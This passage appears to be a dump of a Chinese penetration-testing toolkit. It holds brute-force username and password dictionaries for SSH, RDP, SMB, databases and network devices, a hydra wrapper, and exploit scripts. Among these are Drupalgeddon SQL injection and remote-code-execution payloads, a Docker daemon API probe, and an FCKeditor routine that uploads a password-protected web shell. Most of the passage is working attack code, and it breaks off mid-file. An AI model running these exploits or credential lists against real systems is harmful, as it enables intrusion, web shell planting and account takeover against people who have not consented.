4 | 2 5 | 3 6 | 4 7 | 5 8 | 6 9 | 7 10 | 8 11 | 9 12 | 123 13 | 456 14 | 1234 15 | 123456 16 | 123456 17 | 1212 18 | 12345678 19 | 23456789 20 | 246 21 | 249 22 | 369 23 | 777 24 | 888 25 | 7878 26 | 8787 27 | 8888 28 | 518 29 | 911 30 | 1022 31 | 92072 32 | 111111 33 | 121212 34 | 123123 35 | 123456 36 | Sa 37 | sA 38 | SA 39 | a12345 40 | a1b2c3 41 | a1b2c3d4 42 | fgh@#$ 43 | qwe!@# 44 | aaa 45 | aaaaaa 46 | abby 47 | abc 48 | abc123 49 | ABC123 50 | abcd 51 | abcd1234 52 | abcde 53 | Abcdef 54 | abcdef 55 | -------------------------------------------------------------------------------- /bf_dicts/Microsoft_SQL_Server-user.txt: -------------------------------------------------------------------------------- 1 | sa 2 | probe 3 | repl_publisher 4 | repl_subscriber 5 | distributor_admin 6 | admin 7 | Administrator 8 | guest 9 | test 10 | root 11 | -------------------------------------------------------------------------------- /bf_dicts/MySQL-passwd.txt: -------------------------------------------------------------------------------- 1 | 123 2 | 123123 3 | 123456 4 | 12345678 5 | !@# 6 | !@#$%^ 7 | !@#$%^&* 8 | 111111 9 | 666666 10 | abc 11 | test 12 | 888888 13 | fgh@#$ 14 | qwe!@# 15 | 123321 16 | |+_)( 17 | Admin123 18 | 88888888 19 | 66666666 20 | 111111 21 | guest 22 | test123 23 | master 24 | admin 25 | root 26 | 11111111 27 | 000000 28 | 8888 29 | 6666 30 | 123!@# 31 | 00000000 32 | 1234567 33 | aaaaaa 34 | 654321 35 | 999999 36 | 222222 37 | password 38 | abcdefg 39 | woaini 40 | iloveyou 41 | exit 42 | 99999999 43 | 333333 44 | 444444 45 | 555555 46 | 999999 47 | 000000 48 | 00000000 49 | 6543210 50 | 111222 51 | asdfghjkl 52 | abc123 53 | 666888 54 | zzzzzz 55 | abcd1234 56 | Guest123 57 | 1234 58 | 12345 59 | ab 60 | abcd 61 | abcde 62 | abcdef 63 | abcdefg 64 | abcdefgh 65 | abcdefghi 66 | Admin123 67 | 123qwe 68 | qazwsx 69 | qweasd 70 | asdfjkl; 71 | `1234567890-= 72 | 1234567890-= 73 | !@#$%^&*()_+ 74 | ~!@#$%^&*()_+ 75 | -------------------------------------------------------------------------------- /bf_dicts/MySQL-user.txt: -------------------------------------------------------------------------------- 1 | root 2 | mysql 3 | test 4 | user 5 | guest 6 | -------------------------------------------------------------------------------- /bf_dicts/ORACLE-passwd.txt: -------------------------------------------------------------------------------- 1 | SYSTEM 2 | system 3 | 123456 4 | abc123 5 | xiaoming 6 | 12345678 7 | iloveyou 8 | admin 9 | qq123456 10 | taobao 11 | root 12 | wang1234 13 | MANAGER 14 | CHANGE_ON_INSTALL 15 | internal 16 | 123456 17 | 8888 18 | 888888 19 | 1234 20 | fgh@#$ 21 | qwe!@# 22 | -------------------------------------------------------------------------------- /bf_dicts/ORACLE-user.txt: -------------------------------------------------------------------------------- 1 | SYSTEM 2 | SYS 3 | DBSNMP 4 | SCOTT 5 | OUTLN 6 | MDSYS 7 | ORDSYS 8 | WKSYS 9 | OLAPDBA 10 | CTXSYS 11 | OLAPSYS 12 | ORDPLUGINS 13 | QS_CBADM 14 | demo 15 | ORACLE 16 | missys 17 | RMAN 18 | QS_OS 19 | QS_ES 20 | SH 21 | PM 22 | OE 23 | HR 24 | QS_WS 25 | QS 26 | QS_ADM 27 | QS_CS 28 | QS_CB 29 | -------------------------------------------------------------------------------- /bf_dicts/POP3-passwd.txt: -------------------------------------------------------------------------------- 1 | 123 2 | 123123 3 | 123456 4 | 12345678 5 | test 6 | xiaoming 7 | !@# 8 | !@#$%^ 9 | !@#$%^&* 10 | 111111 11 | 666666 12 | abc 13 | 888888 14 | qq123456 15 | taobao 16 | wang1234 17 | 123321 18 | |+_)( 19 | Admin123 20 | 88888888 21 | 66666666 22 | 111111 23 | guest 24 | test123 25 | master 26 | admin 27 | root 28 | 11111111 29 | 000000 30 | 8888 31 | 6666 32 | 123!@# 33 | 00000000 34 | 1234567 35 | aaaaaa 36 | 654321 37 | 999999 38 | 222222 39 | password 40 | abcdefg 41 | woaini 42 | iloveyou 43 | exit 44 | 99999999 45 | 333333 46 | 444444 47 | 555555 48 | 999999 49 | 000000 50 | 00000000 51 | 6543210 52 | 111222 53 | asdfghjkl 54 | abc123 55 | 666888 56 | zzzzzz 57 | abcd1234 58 | Guest123 59 | 1234 60 | 12345 61 | ab 62 | abcd 63 | abcde 64 | abcdef 65 | abcdefg 66 | abcdefgh 67 | abcdefghi 68 | Admin123 69 | 123qwe 70 | qazwsx 71 | qweasd 72 | asdfjkl; 73 | `1234567890-= 74 | 1234567890-= 75 | !@#$%^&*()_+ 76 | ~!@#$%^&*()_+ 77 | fgh@#$ 78 | -------------------------------------------------------------------------------- /bf_dicts/POP3-user.txt: -------------------------------------------------------------------------------- 1 | desc 2 | test@example.com 3 | root@example.com -------------------------------------------------------------------------------- /bf_dicts/RDP-passwd.txt: -------------------------------------------------------------------------------- 1 | 456852ASDwsx. 2 | 3 | 123 4 | 123123 5 | 123456 6 | 12345678 7 | !@# 8 | !@#$%^ 9 | !@#$%^&* 10 | 111111 11 | 666666 12 | abc 13 | test 14 | 888888 15 | qwe!@# 16 | xiaoming 17 | qq123456 18 | taobao 19 | wang1234 20 | [level=3] 21 | 123321 22 | 1234 23 | |+_)( 24 | Admin123 25 | 88888888 26 | 66666666 27 | 111111 28 | guest 29 | test123 30 | master 31 | admin 32 | root 33 | 11111111 34 | 000000 35 | 8888 36 | 6666 37 | 123!@# 38 | 00000000 39 | 1234567 40 | aaaaaa 41 | 654321 42 | 999999 43 | 222222 44 | password 45 | abcdefg 46 | woaini 47 | iloveyou 48 | exit 49 | 99999999 50 | 333333 51 | 444444 52 | 555555 53 | 999999 54 | 000000 55 | 00000000 56 | 6543210 57 | 111222 58 | asdfghjkl 59 | abc123 60 | 666888 61 | zzzzzz 62 | abcd1234 63 | Guest123 64 | 1234 65 | 12345 66 | ab 67 | abcd 68 | abcde 69 | abcdef 70 | abcdefg 71 | abcdefgh 72 | abcdefghi 73 | Admin123 74 | 123qwe 75 | qazwsx 76 | qweasd 77 | asdfjkl; 78 | `1234567890-= 79 | 1234567890-= 80 | !@#$%^&*()_+ 81 | ~!@#$%^&*()_+ 82 | -------------------------------------------------------------------------------- /bf_dicts/RDP-user.txt: -------------------------------------------------------------------------------- 1 | Administrator 2 | Guest 3 | test 4 | administrator 5 | admin 6 | -------------------------------------------------------------------------------- /bf_dicts/SMB-passwd.txt: -------------------------------------------------------------------------------- 1 | 123 2 | 123123 3 | 123456 4 | 12345678 5 | !@# 6 | !@#$%^ 7 | !@#$%^&* 8 | 111111 9 | 666666 10 | abc 11 | test 12 | 888888 13 | qwe!@# 14 | xiaoming 15 | qq123456 16 | taobao 17 | wang1234 18 | 123321 19 | |+_)( 20 | Admin123 21 | 88888888 22 | 66666666 23 | 111111 24 | [level=4] 25 | guest 26 | test123 27 | master 28 | admin 29 | root 30 | 11111111 31 | 000000 32 | 8888 33 | 6666 34 | 123!@# 35 | 00000000 36 | 1234567 37 | aaaaaa 38 | 654321 39 | 999999 40 | 222222 41 | password 42 | abcdefg 43 | woaini 44 | iloveyou 45 | exit 46 | 99999999 47 | 333333 48 | 444444 49 | 555555 50 | 999999 51 | 000000 52 | 00000000 53 | 6543210 54 | 111222 55 | asdfghjkl 56 | abc123 57 | 666888 58 | zzzzzz 59 | abcd1234 60 | Guest123 61 | 1234 62 | 12345 63 | ab 64 | abcd 65 | abcde 66 | abcdef 67 | abcdefg 68 | abcdefgh 69 | abcdefghi 70 | Admin123 71 | 123qwe 72 | qazwsx 73 | qweasd 74 | asdfjkl; 75 | `1234567890-= 76 | 1234567890-= 77 | !@#$%^&*()_+ 78 | ~!@#$%^&*()_+ 79 | -------------------------------------------------------------------------------- /bf_dicts/SMB-user.txt: -------------------------------------------------------------------------------- 1 | Administrator 2 | Guest 3 | test 4 | -------------------------------------------------------------------------------- /bf_dicts/SNMPpasswd.txt: -------------------------------------------------------------------------------- 1 | admin 2 | cisco 3 | netadmin 4 | private 5 | 1234 6 | root 7 | super 8 | router 9 | public 10 | pento 11 | password 12 | 123456 13 | sysadm 14 | default 15 | switch 16 | backdoor 17 | recovery 18 | secure 19 | anicust 20 | d.e.b.u.g 21 | ADTRAN 22 | installer 23 | surt 24 | NetICs 25 | adminttd 26 | D-Link 27 | tech 28 | private 29 | synnet 30 | adtran 31 | hello 32 | security 33 | guest 34 | smile 35 | support 36 | PASSWORD 37 | changeme2 38 | ascend 39 | netopia 40 | echo 41 | pass 42 | corecess 43 | Manager 44 | secret 45 | BRIDGE 46 | atc123 47 | Password 48 | superuser 49 | 123456 50 | emradmin 51 | 12345678 52 | 123qwe 53 | qwe123 54 | fgh@#$ 55 | -------------------------------------------------------------------------------- /bf_dicts/SSH-passwd.txt: -------------------------------------------------------------------------------- 1 | nsfocus123 2 | 123 3 | 123123 4 | 123456 5 | 12345678 6 | !@# 7 | !@#$%^ 8 | !@#$%^&* 9 | 111111 10 | 666666 11 | abc 12 | test 13 | 888888 14 | xiaoming 15 | qwe!@# 16 | 123321 17 | |+_)( 18 | qwe!@#123 19 | Admin123 20 | 88888888 21 | 66666666 22 | 111111 23 | guest 24 | test123 25 | master 26 | admin 27 | root 28 | 11111111 29 | 000000 30 | 8888 31 | 6666 32 | 123!@# 33 | 00000000 34 | 1234567 35 | aaaaaa 36 | 654321 37 | 999999 38 | 222222 39 | password 40 | abcdefg 41 | woaini 42 | iloveyou 43 | qq123456 44 | taobao 45 | wang1234 46 | exit 47 | 99999999 48 | 333333 49 | 444444 50 | 555555 51 | 999999 52 | 000000 53 | 00000000 54 | 6543210 55 | 111222 56 | asdfghjkl 57 | abc123 58 | 666888 59 | zzzzzz 60 | abcd1234 61 | Guest123 62 | 1234 63 | 12345 64 | ab 65 | abcd 66 | abcde 67 | abcdef 68 | abcdefg 69 | abcdefgh 70 | abcdefghi 71 | Admin123 72 | 123qwe 73 | qazwsx 74 | qweasd 75 | asdfjkl; 76 | `1234567890-= 77 | 1234567890-= 78 | !@#$%^&*()_+ 79 | ~!@#$%^&*()_+ 80 | -------------------------------------------------------------------------------- /bf_dicts/SSH-user.txt: -------------------------------------------------------------------------------- 1 | root 2 | mysql 3 | oracle 4 | test 5 | user 6 | guest 7 | -------------------------------------------------------------------------------- /bf_dicts/SYBASE-passwd.txt: -------------------------------------------------------------------------------- 1 | abc123 2 | xiaoming 3 | iloveyou 4 | admin 5 | SQL 6 | dbopswd 7 | rdrpswd 8 | pkipasswd 9 | sybase 10 | fgh@#$ 11 | 123qwe 12 | 123456 13 | 12345678 14 | 123 15 | qq123456 16 | taobao 17 | wang1234 18 | -------------------------------------------------------------------------------- /bf_dicts/SYBASE-user.txt: -------------------------------------------------------------------------------- 1 | admin 2 | Mon_user 3 | Dba 4 | entldbdbo 5 | entldbreader 6 | jagadmin 7 | PlAdmin 8 | pkiuser 9 | PortalAdmin 10 | pso 11 | dbo 12 | probe 13 | sybmail 14 | test 15 | sa 16 | -------------------------------------------------------------------------------- /bf_dicts/TELNET-passwd.txt: -------------------------------------------------------------------------------- 1 | 123 2 | test 3 | admin 4 | cisco 5 | netadmin 6 | private 7 | 1234 8 | root 9 | super 10 | router 11 | public 12 | pento 13 | password 14 | 123456 15 | sysadm 16 | default 17 | qwe!@# 18 | switch 19 | backdoor 20 | recovery 21 | secure 22 | anicust 23 | d.e.b.u.g 24 | ADTRAN 25 | installer 26 | surt 27 | NetICs 28 | adminttd 29 | D-Link 30 | tech 31 | private 32 | synnet 33 | adtran 34 | hello 35 | security 36 | guest 37 | smile 38 | support 39 | PASSWORD 40 | changeme2 41 | ascend 42 | netopia 43 | echo 44 | pass 45 | corecess 46 | Manager 47 | secret 48 | BRIDGE 49 | atc123 50 | Password 51 | superuser 52 | 123456 53 | emradmin 54 | 12345678 55 | 123321 56 | |+_)( 57 | Admin123 58 | 88888888 59 | 66666666 60 | 111111 61 | guest 62 | test123 63 | master 64 | admin 65 | root 66 | 11111111 67 | 000000 68 | 8888 69 | 6666 70 | 123!@# 71 | 00000000 72 | 1234567 73 | aaaaaa 74 | 654321 75 | 999999 76 | 222222 77 | password 78 | abcdefg 79 | woaini 80 | iloveyou 81 | exit 82 | 99999999 83 | 333333 84 | 444444 85 | 555555 86 | 999999 87 | 000000 88 | 00000000 89 | 6543210 90 | 111222 91 | asdfghjkl 92 | abc123 93 | 666888 94 | zzzzzz 95 | abcd1234 96 | Guest123 97 | 1234 98 | 12345 99 | ab 100 | abcd 101 | abcde 102 | abcdef 103 | abcdefg 104 | abcdefgh 105 | abcdefghi 106 | Admin123 107 | 123qwe 108 | qazwsx 109 | qweasd 110 | asdfjkl; 111 | `1234567890-= 112 | 1234567890-= 113 | !@#$%^&*()_+ 114 | ~!@#$%^&*()_+ 115 | qwe!@#123 116 | -------------------------------------------------------------------------------- /bf_dicts/TELNET-user.txt: -------------------------------------------------------------------------------- 1 | administrator 2 | root 3 | admin 4 | test 5 | guest 6 | -------------------------------------------------------------------------------- /bf_dicts/TOMCAT-passwd.txt: -------------------------------------------------------------------------------- 1 | admin 2 | tomcat 3 | 123 4 | 123456 5 | root 6 | fgh@#$ 7 | qwe!@# 8 | admin123 9 | admin123456 10 | -------------------------------------------------------------------------------- /bf_dicts/TOMCAT-user.txt: -------------------------------------------------------------------------------- 1 | admin 2 | tomcat 3 | both 4 | role1 5 | root 6 | -------------------------------------------------------------------------------- /bf_dicts/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- -------------------------------------------------------------------------------- /bf_dicts/bf.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import docker 3 | import os 4 | 5 | ''' 6 | hydra 7 | ''' 8 | 9 | 10 | def attack(service,ip,port): 11 | if service == 'ftp': 12 | os.chdir('bf_dicts') 13 | os.system(f'hydra -L FTP-user.txt -P FTP-passwd.txt -V -s {port} {ip} {service}') 14 | else: 15 | print('Service for -'+service+'- not support!') 16 | 17 | print(service,ip,port) 18 | 19 | 20 | 21 | 22 | if __name__ == "__main__": 23 | attack() 24 | -------------------------------------------------------------------------------- /bf_dicts/通用-常见口令列表.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1120362990/vulnerability-list/ef35be4029f4e7160e64d8339f9e43513a7fc40f/bf_dicts/通用-常见口令列表.txt -------------------------------------------------------------------------------- /bf_dicts/通用-常见用户名列表.txt: -------------------------------------------------------------------------------- 1 | Administrator 2 | root 3 | test 4 | system 5 | admin 6 | administrator 7 | guest 8 | ftp 9 | user 10 | guest 11 | sa 12 | manager 13 | lp 14 | sys 15 | adm 16 | -------------------------------------------------------------------------------- /docker_vuln/Main_docker.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import docker_vuln.docker_daemon_api 3 | 4 | 5 | def exec(URL): 6 | docker_vuln.docker_daemon_api.attack(URL) 7 | 8 | 9 | if __name__ == "__main__": 10 | exec() 11 | -------------------------------------------------------------------------------- /docker_vuln/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | -------------------------------------------------------------------------------- /docker_vuln/docker_daemon_api.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import docker 3 | 4 | 5 | ''' 6 | Usage: 7 | moon.py -u docker_vuln http://127.0.0.1:2375 8 | 此漏洞默认存在2375端口上-nmap扫描结果- 2375/tcp open docker 9 | 贴一个漏洞介绍,可能拿shell:https://blog.csdn.net/qq_33020901/article/details/78685447 10 | ''' 11 | 12 | 13 | def attack(URL): 14 | print('[+]开始检测-Docker-docker_daemon_api未授权访问。[+]') 15 | try: 16 | client = docker.DockerClient(base_url=URL) 17 | 18 | print('获取到的容器列表:'+str(client.containers.list())) 19 | print('[+]存在漏洞,连接成功!!!') 20 | except Exception: 21 | print('[-]连接失败,漏洞不存在。') 22 | print('[+]检测完成-Docker-docker_daemon_api未授权访问。[+]') 23 | print('\n') 24 | 25 | 26 | if __name__ == "__main__": 27 | attack() 28 | -------------------------------------------------------------------------------- /durpal/CVE_2014_3704.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | from bs4 import BeautifulSoup 3 | import requests 4 | 5 | ''' 6 | Usage: 7 | moon.py -u drupal http://127.0.0.1:8080 8 | Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704) 9 | ''' 10 | 11 | 12 | def attack(URL): 13 | url = URL+'/?q=node&destination=node' 14 | print('[+]开始检测-Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)。[+]') 15 | 16 | user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 17 | Content_Type = "application/x-www-form-urlencoded" 18 | headers = {"User-Agent":user_agent,"Content-Type":Content_Type} 19 | 20 | data = 'pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a' 21 | try: 22 | r = requests.post(url,data=data, headers=headers, verify=False) 23 | soup = BeautifulSoup(r.content,"lxml") 24 | print('请查看以下内容中是否有 用户名+@+IP 的注入结果:') 25 | print('--------------------') 26 | print(str(soup.find_all('li')[2])[100:135])#截取注入结果的那一段字符出来 27 | print('--------------------') 28 | except Exception: 29 | print('someerror!') 30 | print('[+]检测结束-Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)。[+]') 31 | print('\n') 32 | 33 | 34 | if __name__ == "__main__": 35 | attack() 36 | -------------------------------------------------------------------------------- /durpal/CVE_2018_7600.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import requests 3 | # https://github.com/a2u/CVE-2018-7600/blob/master/exploit.py 4 | 5 | ''' 6 | Usage: 7 | moon.py -u drupal http://127.0.0.1:8080 8 | Drupal Drupalgeddon 2远程代码执行漏洞(CVE-2018-7600) 9 | ''' 10 | 11 | 12 | def attack(URL): 13 | print('[+]开始检测-Drupal Drupalgeddon 2远程代码执行漏洞(CVE-2018-7600)。[+]') 14 | url = URL + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' 15 | payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "^w^" | tee hello.txt'} 16 | # print(url) 17 | try: 18 | r = requests.post(url, data=payload, verify=False) 19 | check = requests.get(URL + '/hello.txt', verify=False) 20 | if check.status_code != 200: 21 | sys.exit("Not exploitable") 22 | print('error!') 23 | print('可能存在漏洞-Check: ' + URL + '/hello.txt ^w^') 24 | except: 25 | print('someerroe!') 26 | print('[+]检测结束-Drupal Drupalgeddon 2远程代码执行漏洞(CVE-2018-7600)。[+]') 27 | print('\n') 28 | 29 | if __name__ == "__main__": 30 | attack() 31 | -------------------------------------------------------------------------------- /durpal/Main_durpal.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import os 3 | import durpal.CVE_2014_3704 4 | import durpal.CVE_2018_7600 5 | 6 | def exec(URL): 7 | durpal.CVE_2014_3704.attack(URL) 8 | durpal.CVE_2018_7600.attack(URL) 9 | 10 | 11 | 12 | 13 | if __name__ == "__main__": 14 | exec() 15 | -------------------------------------------------------------------------------- /durpal/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- -------------------------------------------------------------------------------- /fckeditor/Main_fckeditor.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import fckeditor.fckeditor_version 3 | import fckeditor.fckeditor_dangerfile 4 | import fckeditor.fckeditor_getshell 5 | 6 | 7 | def exec(URL): 8 | fckeditor.fckeditor_version.attack(URL) 9 | fckeditor.fckeditor_dangerfile.attack(URL) 10 | fckeditor.fckeditor_getshell.attack(URL) 11 | 12 | 13 | if __name__ == "__main__": 14 | exec() 15 | -------------------------------------------------------------------------------- /fckeditor/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- -------------------------------------------------------------------------------- /fckeditor/fckeditor_dangerfile.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import requests 3 | 4 | ''' 5 | Usage: 6 | moon.py -u fck http://127.0.0.1:8080 7 | ''' 8 | 9 | 10 | def attack(URL): 11 | urls = ( 12 | '/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/', 13 | '/FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp', 14 | '/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php', 15 | '/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp', 16 | '/FCKeditor/editor/filemanager/browser/default/connectors/test.html', 17 | '/FCKeditor/editor/filemanager/upload/test.html', 18 | '/FCKeditor/editor/filemanager/connectors/test.html', 19 | '/FCKeditor/editor/filemanager/connectors/uploadtest.html', 20 | '/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector', 21 | '/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/', 22 | '/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/', 23 | '/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/', 24 | '/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp', 25 | '/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/jsp/connector.jsp', 26 | '/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/php/connector.php', 27 | '/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php', 28 | '/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fjsp%2Fconnector.jsp', 29 | '/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fasp%2Fconnector.asp', 30 | '/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp', 31 | '/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp', 32 | '/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php', 33 | '/editor/filemanager/browser/default/connectors/test.html', 34 | '/editor/filemanager/upload/test.html', 35 | '/editor/filemanager/connectors/test.html', 36 | '/editor/filemanager/connectors/uploadtest.html', 37 | '/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector' 38 | ) 39 | 40 | print('[+]开始检测-Fckeditor敏感目录。[+]') 41 | user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 42 | headers = {"User-Agent":user_agent} 43 | for url in urls: 44 | url = URL + url 45 | try: 46 | verify_response = requests.get(url, headers=headers) 47 | if verify_response.status_code == 200: 48 | print('存在此页面:'+url) 49 | else: 50 | continue 51 | except Exception: 52 | print("Someerror!") 53 | print('[+]检测结束-Fckeditor敏感目录。[+]') 54 | print('\n') 55 | 56 | 57 | if __name__ == "__main__": 58 | attack() 59 | -------------------------------------------------------------------------------- /fckeditor/fckeditor_getshell.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | from requests_toolbelt.multipart.encoder import MultipartEncoder 3 | import requests 4 | import string 5 | from random import * 6 | import re 7 | import sys 8 | 9 | ''' 10 | Usage: 11 | moon.py -u fck http://127.0.0.1:8080 12 | fck <2.4.x版本(也就是2.4.x及以下)的File参数时为黑名单验证,可以通过上传.asa、.cer、.asp;jpg(针对IIS6)。 13 | 如果asa、cer不被解析,还可以传.asp[空格]。传的方法就是抓包然后在数据包里的文件名后填个空格。 14 | 实际测试过程中还是上传asa可以,以下脚本也基于asa上传 15 | fck编辑器如要上传文件需配置相关项目,如果出现上传成功且获取上传路径失败,就可能是配置不允许上传。 16 | 返回包出现这类文字基本上就是设置不允许上传:This connector is disabled. Please check the 17 | ''' 18 | 19 | 20 | def gen_shell(): 21 | min_char = 4 22 | max_char = 12 23 | allchar = string.ascii_letters + string.digits 24 | shell_name = "".join(choice(allchar) for x in range(randint(min_char, max_char))) 25 | return shell_name 26 | 27 | 28 | def geturl(URL): 29 | user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 30 | headers={"User-Agent":user_agent} 31 | 32 | urls = ( 33 | '/editor/filemanager/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/', #fck25 34 | '/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/', #fck243 35 | '/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=/',#fck21,#fck22,fck23 36 | ) 37 | for url in urls: 38 | url = URL + url 39 | try: 40 | verify_response = requests.get(url, headers=headers) 41 | html = verify_response.content.decode('utf-8') 42 | soup = re.search(r'', html) 43 | print("此Fckeditor上传路径为:" + soup.group(1)) 44 | return soup.group(1) 45 | break 46 | except Exception: 47 | pass 48 | 49 | 50 | def attack(URL): 51 | print('[+]开始检测-Fckeditor<=2.4版本简单文件上传。asp[+]') 52 | url = URL + '/editor/filemanager/browser/default/connectors/test.html' 53 | user_agent = "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36" 54 | headers = {"User-Agent": user_agent,"Upgrade-Insecure-Requests": "1"} 55 | verify_response = requests.get(url, headers=headers) 56 | shellname = gen_shell() 57 | if verify_response.status_code == 200: 58 | print('存在有风险的上传页面:'+url) 59 | try: 60 | url = URL + '/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=/' 61 | pwd = sys.argv[0] # 获取当前文件夹的路径 62 | m = MultipartEncoder(fields={'NewFile': (f'{shellname}.asa', open(f'{pwd}\\..\\fckeditor\\shell.asa', 'rb'), 'application/octet-stream')}) 63 | headers={'Content-Type': m.content_type, 64 | 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36', 65 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 66 | 'Accept-Language':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3' 67 | } 68 | r = requests.post(url, data=m, headers=headers) 69 | print('上传shell成功!') 70 | try: 71 | aim_url = geturl(URL) 72 | URL = re.match('http://(.*?)/',URL).group() 73 | print('Shell地址为:'+URL + aim_url+shellname+'.asa') 74 | print('shell密码为:gutf987y97y97。') 75 | except Exception: 76 | print('获取上传路径失败,shell名为:'+shellname+'.asa') 77 | print('shell密码为:gutf987y97y97。') 78 | except Exception: 79 | print('上传shell发生错误。') 80 | else: 81 | print('未发现该页面:'+url) 82 | print('[+]检测结束-Fckeditor<=2.4版本简单文件上传。[+]') 83 | print('\n') 84 | 85 | 86 | if __name__ == "__main__": 87 | attack() 88 | -------------------------------------------------------------------------------- /fckeditor/fckeditor_version.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | from bs4 import BeautifulSoup 4 | import requests 5 | import re 6 | 7 | ''' 8 | Usage: 9 | moon.py -u fck http://127.0.0.1:8080 #此脚本需更新,效果较差 10 | 11 | ''' 12 | 13 | def attack(URL): 14 | #获取fck版本 15 | user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 16 | headers={"User-Agent":user_agent} 17 | url = URL + '/_whatsnew.html' 18 | try: 19 | verify_response = requests.get(url, headers=headers) 20 | html = verify_response.content 21 | soup = BeautifulSoup(html, "lxml") 22 | print("[+]此Fckeditor版本为:"+soup.h3.string.strip()) 23 | 24 | except : 25 | print("[-]获取Fckeditor版本错误!!") 26 | 27 | #获取fck文件上传路径,这里针对高版本有问题。得推倒从来 28 | urls = ( 29 | '/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/', 30 | '/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/', 31 | '/editor/filemanager/browser/default/connectors/cfm/connector.cfm?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/', 32 | '/editor/filemanager/browser/default/connectors/lasso/connector.lasso?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/', 33 | '/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/', 34 | '/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/', 35 | '/editor/filemanager/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/', 36 | 